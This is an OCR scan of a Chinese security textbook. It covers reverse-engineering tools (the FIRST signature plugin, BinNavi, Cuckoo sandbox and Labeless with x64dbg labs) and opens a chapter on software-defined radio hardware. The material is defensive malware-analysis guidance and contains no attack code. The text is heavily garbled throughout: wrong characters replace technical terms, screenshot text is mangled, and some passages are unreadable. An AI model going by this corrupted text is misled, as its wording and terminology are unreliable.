FIRST 由 思科 TALOS 开 发 的 插件 。 提 供 的 功能 类 似 于 CrowdRE 和 BinCrowd:; 
但 与 上 述 插件 不 同 的 是 ，FIRST 允 许 运 行 目 己 的 私有 库 。 该 插件 还 在 积极 开 
发 和 维护 中 。 

BinNavi 一 个 刻 癌 工程 反 汇 编 前 闪 ， 面 癌 漏 洞 研究 人 员 和 恶意 软件 分 机 人 
员 。BinNavi 文 持 协 作 分 析 工 作 流 ， 文 持 使 用 REIL(Reverse Engineering 
Intermediate Language， 近 问 工 程 中 国语 言 ) 编 与 独立 于 平台 的 分 析 。 
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4.2.1 利用 FIRST 协 作 知 识 


顾名思义 ， 使 用 FIRST(Function Identification and Recovery Signature Tool, A% 
识别 和 恢复 签名 工具 ) 可 管理 标注 函数 的 数据 库 ， 并 执行 基 似 的 得 找 ， 人 允许 任何 人 共 
享 冰 数 名 以 及 在 库 中 得 找 模糊 函数 匹配 ， 以 实现 协作 。EFIRST 开 友 者 已 为 知名 的 库 
函数 名 (OpenSSL) 以 及 来 日 恶意 软件 (Zeus) 的 函数 名 编写 了 语料库 索引 。 

里 然 不 像 CollabREate 那 梓 提 供 真正 的 协作 体验 ， 但 FIRST 插 件 允许 处 理 相 同 二 
进 制 代码 的 分 机 人 员 从 中 心 库 获取 函数 名 ， 或 将 函数 名 保存 到 中 心 库 。FIRST 插 件 
的 真正 功能 是 在 不 同 二 进 制 代码 中 重用 函数 名 ， 以 及 利用 旧 数 据 来 识别 和 生命 名 类 
似 功能 。 通 过 扩大 函数 库 ， 可 更 方便 地 跟踪 恶意 软件 系列 ， 或 识别 分 析 的 样本 中 静 
态 链 接 的 音 见 库 ， 这 将 显 堵 缩短 理解 代码 功能 的 时 间 。 

FIRST 插 件 的 安装 过 程 十 分 简单 ，FIRST 网 站 中 包含 完整 的 说 明 。 一 旦 在 IDA 中 
安装 该 插件 ， 就 可 按 下 I 或 选择 Edit | Plugins | FIRST 来 调用 该 插件 。 结 果 对 话 框 包含 
一 个 配置 区 域 ， 需 要 在 其 中 填写 FIRST 服 务 右 信息 ， 如 位 于 first-plugin.us( 闹 口 80) 的 
公共 FIRST 服 务 右 ; 如 末 想 使 用 目 己 的 服务 硕 ， 则 目 定 义 服务 占 的 信息 。 可 使 用 API 
窗 钥 通过 服务 器 的 丑 份 验证 ， 在 http://first.talosintelligence.conmy 上 注册 后 可 获得 API 

典型 的 FIRST 工 作 流 如 下 。 

(1) 在 IDA 中 打开 新 的 二 进 制 代码 ; 在 启动 手动 分 析 前 ,要 尽量 用 名 称 和 原型 标 
注 多 个 函数 。 在 反 汇 编 窗 口中 的 任意 位 置 右 击 ， 选 择 Query FIRST for all function 
matches， 如 图 4-6 所 示 。 
nina 
Fit window 


Zoom 100% 
Text view 


Check FIRST for this function 

Query FIRST for all function matches 
Add this function to FIRST 

Add multiple functions to FIRST 
Apply updated metadata from FIRST 


ite 
E 
£ 
B 
n 
Tr 
T 
T 
n 


Font... 


图 4-6 ”选择 Query FIRST for all function matches 


(2) 在 Check All Functions% F, —75674%Show only “sub " functions 过 滤 
器 来 过 滤 所 有 已 命名 的 函数 。 这 确保 IDA 数 据 库 中 的 任何 已 命名 函数 不 会 被 FIRST 
重 写 。 另 一 个 方便 选择 是 使 用 Select Highest Ranked， 将 匹配 的 函数 作为 默认 选择 标 
准 ， 然 后 手动 查看 结果 。 如 果 蔡 代 项 更 合适 ， 就 删除 或 更 改 所 选 的 函数 ， 如 网 4-7 
所 示 。 
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T^ FIRST: Check for Function Prototypes 


Check All Functions 


Query FIRST's server for function metadata. 

If a function within this IDB matches a signature found in FIRST then it and its metadata will be available for you to select 
below to apply to your IDB. Select the function you wish to apply existing metadata to in order to view the possible 
matches. 


[Matches Rank Similarity | Prototype 
- sub 10001360 | 


| - sub 100013E0 


| - sub 100014A0 
- sub 10001910 


-sub. ELE 


aa 


Matched 62 out of 108 functions Show only "sub. " functions 


[3] oes 


图 4-7 Check All Functions 对 话 框 


当 确定 具有 多 个 匹配 的 函数 名 时 ， 应 当 考 虑 以 下 一 些 参数 : 
e Rank 显示 FIRST 用 户 选 择 和 应 用 特定 名 称 的 次 数 。 这 不 是 什么 评级 标准 ， 
但 可 用 来 分 析 其 他 用 户 心 目 中 的 好 名 称 。 
e Similarity 显示 所 人 查询 冰 数 与 岂 配 结果 的 相似 度 。 
e Prototype 这 是 匹配 结果 的 函数 原型 。 如 果 多 个 结果 的 相似 度 接近 ， 则 有 
必要 考虑 具有 更 好 原型 定义 的 函数 , 这 将 改进 IDA 的 分 析 , 生成 更 好 的 标注 。 
(3) 一 旦 FIRST 完 成 分 机 ， 最 好 在 前 面 显 示 的 上 下 文集 单 中 选择 Add multiple 
functions to FIRST， 将 所 有 函数 名 上 传 到 FIRST 数 据 库 。 要 上 传 所 有 已 命名 的 函数 ， 
最 简便 的 方法 是 在 Mass Function Upload 对 话 杠 中 选择 Filter Out “sub " functions 
和 Select Al YEAS, WA4-8ATAN. 


T^ FIRST: Mass Function Prototype Upload 


Mass Function Upload 
eo alert ile hg i 
the functions you want to upload. Click to select a function and dick again to 
. Once uploaded you can manage prototypes you've created 


Prototype 
SACO  InitializeKeys int stdcall(LPCSTR PKY, LPCSTR El 
|^ ClearKeys 

DestroyGeneratedKeysAndLoadPubKeyFromFile — int — stdcall(LPCSTR IpFileName) 
SaveEncryptedPrivateKey int _ stdcall(LPCSTR IpFileName) 
ImportKeyFromFile int __ cdecl(int, int, LPCSTR IpFileNai 
SavePublickey int __ cdecl(int, HCRYPTKEY hKey, D' 
ExportAndEncrypt int __cdecl(int, HCRYPTKEY hKey, H J 


图 4-8 Mass Function Upload»: ift 
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(4) 在 管理 区 域 , 可 从 FIRST 捕 件 染 单 管理 上 传 的 函数 元 数据 ,可 在 其 中 得 看 每 
个 已 上 传 函 数 的 历史 信息 ， 如 有 必要 ， 可 删除 。 


4.22 使 用 BinNavi 进 行 协作 


复杂 程序 的 反 汇 编程 序 清单 很 难 理解 ， 因 为 程序 清单 本 质 上 是 线性 的 ， 而 由 于 
程序 执行 所 有 分 文 操 作 的 结果 是 不 同 的 ， 因 此 会 导致 程序 完全 是 非 线性 的 。 
Zynamics( 已 被 Google 收 购 ) 的 BinNavi(Binary Navigator) 工 具 提 供 了 基于 图 的 二 进 制 
代码 分 析 和 调试 功能 .BinNavi 在 反 汇 编 器 后 端 (如 IDA Pro 生 成 的 数据 库 和 fREedom,， 
fREedom Æ Capstone Engine 支持 的 反 汇 编 器 后 端 ) 操 作 。BinNavi 利 用 邻近 浏览 
(proximity browsing) 的 概念 来 防止 视图 变 得 过 于 竣 乱 ， 从 而 提供 三 进 制 代码 的 基于 
图 的 复兴 视图 。BinNavi 图 严 章 依赖 于 基本 块 的 概 仿 。 基 本 块 是 一 组 一 旦 输入 束 要 你 
证 完整 执行 的 指令 。 任 何 基 本 块 中 的 第 一 条 指令 通 音 是 跳 棱 指令 或 调用 指令 的 目标 ， 
而 基本 块 的 最 后 一 条 指令 通 单 是 跳 转 指令 或 返回 指令 。 基 本 块 提 供 了 一 种 便利 途径 ， 
能 在 基于 图 的 视图 右 中 将 指令 按 组 划分 在 一 起 , 可 用 函数 流程 图 中 的 节点 来 表示 块 。 
图 4-9 展 示 了 一 个 选中 的 基本 块 及 其 直接 邻 拓 。 


Ë BinNavi - 0 Flowgraph - Address: 08048F54 name: manage_request Se 
File View Selection Graph NaviPython 


a Q «X OO X aed dP ke oy my dy e 


|- Overview ! 


C undo-28-08049A44 
CA Undo-27-08049A0F 
Undao-25-08049A2A 
[5] Undo-25-08049A0F 
EI Undo-24-08049A44 
[7] Undo-23-08048A0F 
(J undo-22-08049A2A 
CA Undo-21-08049A0F 
[7] Undo-20-08049A44 
E3 Undo-18-Group 


Selected Nodes: [608049444 | 


图 4-9 一 个 选中 的 基本 块 及 其 直接 邻 大 
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选中 的 闻 点 有 一 个 父 节 点 和 两 个 子 节 点 。 这 个 视图 的 邻近 设置 是 一 级 上 级 节点 
和 一 级 下 级 节点 。 在 BinNavi 中 邻近 距离 是 可 以 配置 的 ， 这 束 使 得 用 户 能 在 任意 给 定 
时 间 看 到 更 多 或 更 少 的 二 进 制 代码 。 每 次 选中 新 节点 时 ，BinNavi 显 示 剖 会 更 新 ， 从 
而 只 显示 那些 满足 邻近 条 件 的 邻居 。BinNavi 显 示 的 目的 是 对 复杂 函数 进行 有 效 分 
解 ， 使 分 析 人 员 能 快速 理解 这 些 函数 的 流程 
BinNavi 提 供 了 真正 的 协作 体验 , 因为 处 理 同一 个 数据 库 项 目的 所 有 分 析 人 员 都 
可 实时 更 新 所 有 注释 、 项 目 变化 以 及 生成 它们 的 用 户 的 信息 。BinNavi 支 持 以 下 四 种 
注释 类 型 ; 
e 全 局 行 注释 ”与 IDA 中 的 可 重复 函数 关 似 ， 全 局 行 注释 在 显示 该 行 的 所 有 实 
例 ( 基 本 块 ) 中 都 是 可 见 的 。 
e 本 地 行 注释 ”与 IDA 中 的 不 可 重复 注释 类 似 , 本 地 注释 只 在 定义 它们 的 特定 
基本 块 中 可 见 。 
e TRIER ”这 类 注释 在 目 己 的 块 中 可 见 ， 附 加 a 到 特定 基本 块 或 块 组 。 
函数 注释 ”与 DA 中 的 可 午 复 注释 类 似 ， 函 数 注 释 与 函数 相关 ， 在 针对 特定 
限 数 的 所 有 调用 之 处 可 见 。 
在 图 4-10 中 ， 来 日 不 同 用 户 的 两 个 注释 显示 在 反 汇 编 视图 中 。 
$* WinMain(xxxxj - taskdl.ex - null - BinNavi 


View Graph Selection Search Plugins Window 
 WinMain(xxxx) 3t 


SR Q cq RQ Oq (=) re is di BL dn Et eX x] d» Adress) =v Sea 


Ep Tagging 
‘| 


Prototype 


taskdl .ex ::WinMain(x,x,x,x) 
sub esp, byte 3 GrayHatS: Random comment! 
DifferentUser: Different comment! 


ds: [GetLogicalDrives) 
ebp, ds: [GetDriveTypeW] 
edi, ds: [Sleep] 

ebx, Cax 


^o. F 


- ( Variables | Calling Functions | Register Tracking | Special Instructions | Code Bookmarks 


4] DE Bl void * 


Kl4-10 BinNaviUMEitff(BinNavi collaboration.png) 
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4.3. 动态 分 析 


静态 分 析 的 最 终 方 式 是 通过 逆 癌 工程 来 确定 二 进 制 代 码 的 完整 功能 。 不 过 ， 也 
可 以 采用 为 一 种 方式 。 动 态 分 析 可 提供 午 要 线索 ， 以 帮助 你 理解 恶意 软 件 二 进 制 代 
码 的 目的 。 采 用 这 种 方法 时 ， 可 在 沙 箱 中 运行 屎 意 软 件 ， 此 时 ， 二 进 制 代码 在 安全 
的 环境 中 执行 ， 并 提取 所 需 的 文件 系统 或 网 络 连接 。 

动态 分 析 使 用 快捷 的 “前 测 ”(First Passa SORE 35 [8 CE, “EU” fe 
息 可 立即 显示 出 二 进 制 代码 答 试 做 什么 。 此 后 ， 可 以 使 用 其 他 逆 加 工程 工具 深入 分 
析 工 作 方式 。 使 用 “ 首 测 ”方法 ， 可 以 节省 大 量 时 间 。 一 旦 拥有 动态 分 析 信 息 ， 甚 
至 不 必 执 行 完 整 的 手动 逆 同 工程 。 


4.3.1 使 用 Cuckoo 沙 箱 自 动 执 行动 态 分 析 


2017 年 ，AV-TEST 机 构 每 天 登记 的 唯一 恶意 软件 样本 数量 达到 2 000 万 之 多 。 近 
十 年 来 ， 数 量 一 直 在 稳定 增加 ， 预 计 未 来 会 继续 增长 。 

目 动 文件 分 析 系 统 为 恶意 软件 研究 人 员 提 供 了 可 观察 的 文件 行为 的 模块 化 报 
告 。 考 虑 到 手动 分 析 工 作 十 分 耗 时 ， 目 动 化 是 一 个 十 分 重要 的 方面 。 目 动 化 分 析 报 
告 帮 助 研 究 人 员 处 理 以 下 问题 ; 

e 让 前 所 未 见 的 可 观察 的 部 分 程序 浮 出 水 面 , 这 样 ， 就 能 识别 出 需要 进行 更 深 
入 研究 以 及 进行 耗 时 的 手动 分 析 的 重点 文件 。 

e 其 于 可 观察 的 部 分 程序 或 构件 , 将 现 有 威胁 系列 的 新 样本 聚合 起 来 ,有 助 于 
识别 新 的 恶意 软件 系列 或 现 有 恶意 软件 系列 的 发 展 情况 。 

e 不 使 用 任何 恶意 软件 工程 工具 就 能 大 致 了 解 恶 意 软 件 功能 。 这 有 助 于 分 析 人 
员 较 好 地 了 解 文 件 功 能 的 全 得， 并 集中 精力 分 析 手 头 的 特定 任务 (例如 ， 记 
录 C2 协 议 )。 

Cuckoo 沙 箱 是 一 个 高 级 的 、 高 度 模块 化 的 、 开 源 的 上 自动 化 恶意 软件 分 析 系 统 ， 

可 用 于 多 个 领域 。 上 默认 情况 下 ， 它 能 完成 以 下 工作 : 

e 在 Windows、Linux、macOS 和 Android 虚 拟 化 环境 中 ， 分 析 许 多 不 同类 型 的 
恶意 文件 (可 执行 文件 、Office 文 档 、PDF 文 件 和 电子 邮件 等 ) 和 恶意 网 站 。 

e 跟踪 API 调 用 和 一 般 的 文件 行为 ， 将 其 提炼 为 易 懂 的 高 级 信息 和 签名 。 

e 使 用 本 地 网 络 路 由 文 持 ， 可 以 导出 和 分 析 网 络 法 量 ( 即 使 已 使 用 SSL/TLS 加 
密 )， 也 可 以 丢弃 所 有 流量 ,或 通过 INetSIM、 网 络 接 口 或 VPN 对 流量 进行 重 
新 路 由 。 

e 使 用 内 存 取证 工具 Volatility， 或 使 用 YARA 扫 描 进 程 内 存 ， 对 受 感染 的 虚拟 
系统 执行 高 级 内 存 分 析 。 


第 4 章 下 一 代 逆 向 工程 


发 布 开源 项 目的 妨 一 个 方便 结果 是 : 可 以 通过 运行 多 个 Cuckoo 在 线 示例 来 处 理 
文件 。 对 于 正在 处 理 公 共 样 本 的 分 析 人 员 而 言 ， 这 是 进行 免费 分 析 ， 而 无 须 运 行 和 
维护 Cuckoo 实 例 的 最 简单 方式 。 下 面 是 一 些 知 名 的 在 线 Cuckoo 实 例 : 

e https://sandbox.pikker.ee 

e https://zoo.mlw.re/ 

e https://lmux.huntingmalware.com/ 

e https://malwr.com/ 

Cuckoo 接 口 分 为 多 个 类 别 ， 根 据 典 型 的 恶意 分 析 目 标 可 划分 为 如 下 类 别 : 

e 概览 信息 ”概述 文件 格式 元 数据 (文件 大 小 、 类 型 、 哈 而 等 )、 匹 配 的 YARA 

侈 名 、 重 要 可 执行 程序 的 列表 (服务 或 任务 创建 、 网 络 通信 等 )、 屏 大 截 图、 
一 系列 关联 的 域 和 IP 地 址 。 

e 静态 分 析 ” ”汇总 特定 文件 格式 元 数据 ， 如 PE 头 、 导 入 和 导出 的 API、 识 别 
backer 的 PEiD 签 名 。 
行为 分 析 ”进程 树 ,将 分 析 的 样本 作为 根 方 点 ;还 包括 被 调用 的 API 及 其 参数 。 
网 络 分 析 ” 按 协议 组 合 的 网 络 连 接 列 表 。 
保存 的 文件 ”由 分 析 的 样本 写 入 磁盘 所 有 文件 的 静态 文件 元 数据 。 
进程 内 存 ”进程 内 存 的 快照 ， 可 下 载 并 分 析 解 压 的 和 注入 的 代码 。 

Cuckoo 成 功 合 并 了 裔 态 分析 与 动态 分 析 结 采 ， 提 供 了 关于 恶意 文件 能 力 和 功能 
的 一 体 化 视图 。 通 过 目 动 处 理 文 件 ， 分 析 人 员 可 以 减少 一 些 手动 工作 ， 比 如 收集 所 
需 的 数据 来 理解 威 肋 ， 或 判断 文件 是 否 具 有 恶意 性 。 由 于 Cuckoo 可 以 目 动 完成 一 些 
重复 性 工作 ， 分 析 人 员 可 将 精力 更 多 用 在 研究 和 人 友 现 新 的 恶意 扩 术 上 。 


4.3.2 ”使 用 Labeless 填 补 静 态 工具 与 动态 工具 之 则 的 空 际 


静态 分 析 工 具 和 动态 分 析 工 具 各 有 千秋 。 分 析 人 员 可 能 需要 在 一 个 分 析 项 目 中 
使 用 多 个 工具 ， 具 体 取 决 于 手头 的 任务 类 型 ， 以 及 分 析 人 员 的 工作 偏好 。 一 种 常见 
的 逆向 工程 设置 使 用 诸如 IDA 的 静态 分 析 工 具 ， 以 及 针对 目标 OS 平 台所 选 的 调试 器 
(例如 Windows 上 的 x64dbg)。 

但 是 ， 使 用 多 个 工具 的 问题 在 于 ， 在 一 个 工具 中 标注 的 信息 难以 集成 到 另 一 个 
工具 中 ， 因 此 会 带 来 一 些 重 复 的 额外 工作 ， 降 低 分 析 效 率 。 当 分 析 人 员 使 用 函数 重 
命名 和 IDB 标 注 IDA 插 件 ( 如 FIRST 或 IDAscopej 时 尤其 如 此 ;如果 在 调试 器 中 包含 该 
元 数据 ， 将 有 帮助 作用 。 

Labeless 皇 件 的 作者 将 其 摘 述 为 :“ 一 矢 捅 件 系 统 ， 用 于 在 IDA 数 据 库 和 调试 后 
疹 之 间 实 现 动 态 的 、 无 颖 的 、 实 时 的 同步 。” 目 前 文 持 以 下 Labeless 调 试 后 疹 。 

e OllyDbg 1.10 

e OllyDbg 2.01 
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e DeFixed 1.10 
e x64dbg(x32 和 x64 版 ) 
设置 Labeless 的 过 程 十 分 轻松 ， 只 需要 将 预 编译 的 插件 复制 到 IDA 捅 件 目录 ， 并 


运行 一 个 党 文 持 的 调试 彰 ， 该 调试 大 与 Labeless 归 档 文 件 打包 在 一 起 。 


以 下 典型 的 逆向 工程 工作 流 显示 了 Labeless 的 作用 : 


(1) 在 IDA 反 汇编 占 中 打开 逆向 工程 目标 ， 以 大 体 上 了 解 代码 的 复 林 程度。 
(2) 使 用 FIRST 插 件 从 community 提 取 函 数 标 注 。 
(3) 确定 可 通过 动态 分 析 获 荔 的 函数 或 功能 。 


4.3.3 ”实验 4-1: 将 IDA 标 注 应 用 于 x64dbg 调 试问 


在 这 个 实验 中 , 首先 打开 x64dbg.exe 二 进 制 代码 , 代码 位 于 x64dbg 文 件 夹 (在 IDA 
和 x64dbg 中 ) 的 Labeless 肥 布 包 中 。 下 面 的 代码 段 是 IDA 中 显示 的 汇编 函数 的 开头 音 


分 (入 口 ): 


public start 
start proc near 
sub rsp, 28h 


call | security init cookie 
add rsp; 28h 
jmp .. tmainCRTStartup 


start endp 


IDA FLIRT(Fast Library Identification and Recognition Technology， 库 文件 快速 识 


别 与 鉴定 技术 ) 签 名 与 cookie initialization security init cookie 4! CRT startup 


tmainCRTStartup 匹 配 ， 并 相应 地 命名 。 同 时 ，x86dbg 反 汇编 更 像 是 原始 的 ， 缺 少 
任何 标注 ， 可 在 以 下 代码 段 中 显示 : 
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O0000 /FF6E96F23F8 | 48 83 EC 28 | sub rspy,28 
00007FF6E96F23FC | E8 OF 05 OO 00 | call xó64dbg. /FF6E96F2910 
00007/FF6E96F2401 | 48 83 C4 28 | add rsp,28 
0000/FF6E96F2405 | E9 02 00 00 00 | jmp x64dbg."7FF6E96F240C 


AJIT FHER, Pee MID Adi SH Aa By ye: 
(1) 在 IDA 中 打开 有 目标 二 进 制 文 件 以 及 受 文 持 的 调试 器 (如 x64dbg)。 
(2) 打开 Memory Map 窗 口 ， 在 调试 大 中 找到 模块 的 基地 址 (x64dbg 和 OllyDbg 中 


的 alt-m)。 模 块 的 基地 址 将 与 目标 二 进 制 代码 显示 在 同一 行 上 (例如 ， 如 果 调 试 的 二 
进 制 代 人 码 在 文件 系统 中 命名 为 test.exe， 则 为 test.exe)。 


(3) 在 IDA 工 具 栏 上 选择 Labeless | Settings。 在 最 终 的 对 话 框 (如 图 4-11 所 示 ) 中 ， 


更 改 以 下 选项 : 


a. 在 Remote module base 文 本 框 中 输入 上 一 步 中 找到 的 模块 的 基地 址 。 
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b. 在 Sync labels 区 域 ， 选 中 除 Func name as comment 外 的 所 有 复 选 枉 。 这 可 能 区 
人 而 异 ， 但 如 末 在 反 汇 编 代 码 中 直接 标注 函数 (而 非 写成 注释 )， 则 可 更 方便 地 读 取 
反 汇 编 代 码 。 

c. 选中 Auto-sync on fename 复 选 杠 。 

d. 早 击 Test connection 按 钮 ， 确 保 IDA 与 调试 后 病 之 间 的 连接 正确 工作 。 

(4) 在 Labeless 的 IDA 工 具 栏 中 运行 Sync Labels Now 选 项 ， 或 使 用 Alt+ShifttR 热 
键 ， 将 所 有 IDA 标 注 应 用 于 调试 后 着 。 


P Labeless configuration 


Common IDADump Python editor About 


IP: | 127.0.0. 1] v| pert|3852 [Hl 


Labels & comments sync 


[| Auto-sync on rename 
Remote module base: 


Sync labels: 

Non-code names Comments non-/repeatable 

Local labels Local vars (structs only) ALL 
Demangle [ ] Func name as comment 


Remove func args 


? Remote Python execution | Discard 


4-11  Labelessfid Ei fa O 


TEMPER Val a a Ja» Vil an HJ ci Fa Ple dE ih FSV. FIDA HY BL RIK, 
IDA PS S531 IE] PUE Em 4 PEE E SUPER VARIED. PIE IDA 4 MUS 
x64dbg P If] c 7L 2 WU Ze: 

00007FF6E96F23F8 | 48 83 EC 28 | sub rsp,28 

00007FF6E96PF23FC | E8 OF 05 00 00 | call 

«x64dbg. security init cookie- 


00007FF6E96F2401 | 48 83 C4 28 | add rsp,28 
00007FF6E96F2405 | E9 02 00 00 00 | jmp «x64dbg. tmainCRTStartup> 


4.3.4 ”实验 4-2: Tea RR JP DGOSUSAIDA 


在 处 理 packer 或 内 存 注 入 恶意 软件 时 ， 另 一 项 有 用 的 Labeless 功 能 是 将 调试 器 的 
内 存 段 导 回 IDA。Labeless 支 持 通过 两 个 主要 的 工作 流 来 组 合 静态 分 析 和 动态 分 析 : 
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e 从 IDA 的 静态 分 析 会 话 开始 ， 分 机 人员 想 要 使 用 调试 医 ， 通 过 动态 执行 来 更 

深入 地 理解 目标 应 用 的 内 部 工作 原理 。 

e 从 IDA 的 动态 分 析 会 话 开始 ， 分 析 人 员 想 要 利用 IDA 标 注 丰 是 调试 体验 ， 并 

将 其 他 运行 时 解码 /解密 代码 导入 IDA。 

前 面 讨论 过 第 一 个 工作 流 ， 但 不 应 当 忽略 第 二 个 工作 流 。 在 分 析 混 消 的 恶意 软 
件 或 内 存 注 入 恶意 软件 时 , 最 好 以 更 持久 的 方式 (如 IDA 数 据 库 ) 保 存 执行 状态 和 内 存 
信息 。 

Labeless 包 含 两 个 内 存 导 入 选项 : 

e 全 面 擦 除 并 导入 (wipe all and impor) ”该 选项 从 当前 IDB 中 删除 所 有 上 段 ， 并 

Nia ai SA Aric) A F R E o 
e 保持 现 有 内 容 并 导入 (keep existing and import) 与 前 一 个 选项 不 同 ， 该 选 
项 将 保持 当前 的 IDB， 仅 从 调试 船 导 入 其 他 内 存 页 面 。 

第 二 个 内 存 导 入 选项 解决 了 更 第 见 的 使 用 调试 器 的 附加 内 存 由 面 来 扩展 当前 数 
据 库 的 场景 。 当 从 IDA 工 具 栏 选择 Labeless | IDADump | Keep Existing sé FIFRA 
时 ， 将 显示 Select Memory to Dump 窗口， 该 窗口 列 出 了 调试 进程 中 所 有 了 映射 的 内 存 
页 面 。 要 导入 内 存 页 面 ， 可 从 列表 中 选择 一 个 或 多 个 内 存 区 域 ， 或 定义 所 需 的 虚拟 
Th y El. 

通过 有 效 地 组 合 静 态 分 析 工 具 和 动态 分 析 工 具 ， 并 利用 它们 各 目的 优点 ， 分 析 
人 员 可 在 不 失去 可 用 性 的 前 提 下 ， 取 二 者 之 长 。 


44 本草 小 结 


由 逆向 工程 技术 人 员 组 成 的 社区 非常 活跃 ， 经 常 发 布 新 的 分 析 工 具 和 技术 ， 为 
不 同 的 目标 分 析 各 种 文件 格式 。 在 浩如烟海 的 可 用 资源 中 ， 一 些 有 趣 的 工具 和 研究 
工作 可 能 不 幸 被 遗漏 而 遭 到 不 公正 的 忽视 。 本 章 介绍 了 一 些 较 新 的 工具 和 插件 ， 如 
有 机 会 尝试 ， 这 些 工具 和 插件 可 能 会 显著 提高 分 析 的 信心 和 效率 。 


POR 软件 定义 的 无 线 电 


在 现代 社会 生活 中 ， 无 线 设 备 无 处 不 在 。 这 些 设备 不 再 使 用 有 线 电 绕 ， 这 给 本 
我 们 更 大 的 目 由 空间 , 但 与 此 同时 , 也 增加 了 无 线 设备 遭 党 近 途 和 远程 攻击 的 风险 。 
例如 ， 与 访问 一 台 超 出 建筑 物 物 理 范 围 的 无 线 传 感 吉 相 比 ， 更 困难 的 是 如 何 访 问 一 
台 使 用 物理 连接 线 且 未 公开 的 传 感 左 。 当 然 ， 只 是 访问 无 线 信号 未 必 束 能 从 事 亚 总 
攻击 活动 ， 但 是 ， 大 量 使 用 无 线 设 备 的 确 为 恶意 攻击 活动 开局 了 一 局 大 门 。 

5S Ail(Radio Frequency，RF) 攻 击 是 一 个 十 分 复 末 的 主题 ， 无 法 用 一 草 的 饥 幅 进 
行 全 面 介 绍 。 本 章 上 则 在 使 用 蛙 个 设备 ， 介 绍 经 济 实 用 的 软件 定义 的 无 线 电 
(Software-Defined Radio, SDR), SDR 的 开源 软件 ， 介 绍 评 估 和 测试 产 品 ( 产 品 使 用 
自 定 义 或 半 自 定 义 的 无 线 通 信 协 议 ) 的 过 程 。 


AK E zB SERA T : 
e SDR 入 门 
e 分 析 简 单 RF 设 备 的 攻击 步骤 (SCRAPE) 


5.1 SDRAI] 


SDR 是 使 用 可 定制 的 软件 组 件 实 现 的 无 线 电 功 能 ， 并 使 用 软件 组 件 处 理 原 始 数 
$a; SDR 并 非 单纯 依靠 特定 于 应 用 的 RE 硬件 以 及 数字 信号 处 理 嚣 。SDR 使 用 通用 处 
理 亏 (如 运行 Linux 的 计算 机 ) 资 源 提 供 信 息 处 理 ， 利 用 通用 的 RE 硬件 捕获 和 传输 数 
据 。SDR 的 优点 包括 可 用 单个 (可 能 远程 更 新 ) 的 国 件 包 (Firmware Package) 处 理 多 样 
的 信号 和 频率 。 另 外 ，SDR 在 实施 原型 化 新 系统 时 ， 为 开 友 人 员 / 研 究 人 员 提 供 了 有 灵 
活性 。 


5.1.1 从 何 处 购买 


上 和 面 介 绍 了 了 SDR 的 含义 ， 那 么 从 何 处 购买 SDR 设 备 呢 ?SDR 的 一 些 例子 有 
HackRF、bladeRF 及 USRP; 这 些 设 备 都 使 用 计算 机 上 的 USB 妆 口 ， 并 可 以 与 GNU 
Radio 之 类 的 开源 软件 一 起 使 用 。 表 5-1 简 单 地 比较 了 这 三 种 设备 。 
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表 5-1 三 种 经 济 实惠 的 SDR 的 比较 


工作 频率 IMHz-6GHz 300MHz-3.8GHz 70MHz-6GHz 
BERI Lar Paar CE 


每 秒 样本 数量 (MSps， 61 
Million Samples per second) 


操作 系统 可 以 对 无 线 电 频 率 进 行 适当 调整 。 例 如 ， 赣 牙 在 40~80 个 信道 上 的 工 
作 频 率 是 2.4GHz~2.48GHz, 具体 数值 取决 于 版 本 。 FM 无 线 电 在 101 个 信道 上 的 工作 
频率 是 87.8MHz~108MHz。 虽然 bladeRF 的 工作 频率 明显 低 于 其 他 两 种 设备 , 但 扩展 
板 可 将 低频 有 效 地 降 至 60KHz( 我 不 知道 如 何 使 用 扩展 板 提 高 bladeRF 的 频率 上 限 )。 
HackRF 和 USRP B200 也 可 以 扩展 ， 从 而 有 效 地 降低 工作 频率 下 限 。 

带宽 是 可 由 应 用 /设备 扫描 的 REF 频谱 数量 。 表 S$-1 中 所 列 的 带宽 是 在 各 目的 网 站 
上 公布 的 ， 但 具体 取决 于 加 载 的 固件 。 例 如 ，HackRF 固 件 版 本 2017.02.01 目 前 文 
持 扫描 模式 ， 人 允许 设备 扫描 全 部 6GHz 范 围 。 为 bladeRF 添 加 文 持 ， 将 其 带宽 扩展 为 
124MHz。 增 加 带宽 的 一 个 潜在 好 处 是 能 同时 监控 蓝牙 的 所 有 信道 (80MHz)。 

“ 双 工 (Duplex)” 指 两 个 系统 相互 之 间 的 交流 方式 。 全 双 工 意味 着 设备 可 同时 传 
输 和 接收 信息 。 顾 名 思 义 ， 半 双 工 (HalfDuplex) 意 味 着 设备 可 传输 和 接收 数据 ， 但 不 
能 同时 完成 。 半 双 工 的 示例 是 对 讲 机 和 许多 的 计算 机 VoIP 应 用 。 当 双方 试图 同时 讲话 
时 ， 会 发 生 冲 突 ， 数 据 会 丢失 。 全 双 工 更 灵活 ， 但 SDR 的 双 工 不 会 影响 分 析 的 有 人 效 性 。 

模 数 转换 (Analog-to-Digital Conversion，ADOC) 分 辨 率 指 每 个 样本 可 使 用 的 不 同 


电压 值 数量 。 例 如 ， 电 压 范围 为 4V 的 8 位 ADC 的 分 辩 率 为 15.6mV 或 0.39%。 与 采样 
率 结 合 在 一 起 ， 更 多 位 的 ADC 分 辨 率 意 味 着 模拟 信号 会 由 更 准确 的 数字 表示 。 


公开 的 每 秒 样本 数量 (Million Samples per second) Bit + USBI. CPU, ADC 
转换 器 以 及 每 个 样本 的 大 小 。 例 如 , USRP B200 的 值 61MSps 基 于 使 用 16 位 正 交 样本 ; 
不 过 ， 可 将 系统 配置 为 使 用 8 位 正 交 样本 ， 有 效 地 将 “每 秒 样 本 数量 ”吞吐 量 提高 
一 倍 。 受 文 持 的 HackRF“ 每 秒 样本 数量 ”取决 于 所 选 的 ADC 以 及 USB 厂 吐 量 。 

除了 购买 SDR 外 ， 很 可 能 需要 购买 几 段 电费、 假 负载 、 衰 减 器 和 不 同 频 率 的 天 
线 。 要 对 试验 的 设备 进行 测试 ， 定 同 天 线 有 助 于 隔离 信号 源 。 最 后 ， 在 处 理 常 见 频 
率 ( 如 2.4GHz) 时 ， 简 单 的 隔离 宝 (或 箱子 ) 将 十 分 有 用 。 表 5-1 中 列 出 的 每 个 SDR 都 有 
板 上 的 SMA(Subminiature version A)FEZEREAS, FATHERS. SEVIS AZZ o 
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5.1.2 ”了解 管理 规则 


观察 一 下 周围 的 众多 无 线 设 备 ， 如 收音 机 、 电 话 、 卫 星 和 Wi-Fi 等 ， 这 些 无 
线 设备 的 使 用 都 由 特定 管理 机 构 控 制 。 其 中 两 个 稍 见 的 管理 机 构 是 联邦 通信 委 
